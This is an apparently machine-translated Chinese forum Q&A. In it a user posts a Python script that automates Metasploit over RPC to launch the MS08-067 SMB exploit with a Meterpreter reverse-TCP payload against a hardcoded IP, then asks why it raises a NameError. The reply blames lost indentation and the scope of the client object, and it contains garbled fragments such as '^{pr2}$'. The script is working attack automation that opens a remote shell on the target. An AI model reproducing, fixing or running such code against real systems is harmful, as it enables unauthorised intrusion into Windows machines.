我使用以下代码来自动化Metasploit:
import os, msfrpc, optparse, sys, subprocess
from time import sleep
def sploiter(RHOST, LHOST, LPORT, session):
client = msfrpc.Msfrpc({})
client.login('msf', '123')
ress = client.call('console.create')
console_id = ress['id']
RHOST="192.168.1.102"
LPORT="444"
LHOST="127.0.0.1"
commands = """use exploit/windows/smb/ms08_067_netapi
set PAYLOAD windows/meterpreter/reverse_tcp
set RHOST """+RHOST+"""
set LHOST """+LHOST+"""
set LPORT """+LPORT+"""
set ExitOnSession false
exploit -z
"""
print "[+] Exploiting MS08-067 on: "+RHOST
client.call('console.write',[console_id,commands])
res = client.call('console.read',[console_id])
result = res['data'].split('\n')
但它不起作用,我得到了一个错误:
client.call('console.write',[console_id,commands]) NameError: name 'client' is not defined
有什么问题吗?有没有其他脚本可以以类似的方式工作?在
你的压痕掉了。因此
clients.call()
是在sploiter函数中创建它的上下文之外执行的。在客户机只存在于sploiter方法中。 我不太熟悉python,但我认为您可以调整sploiter方法,以便它返回客户机。在
在下面的部分你可以做一些类似的事情
^{pr2}$相关问题 更多 >
编程相关推荐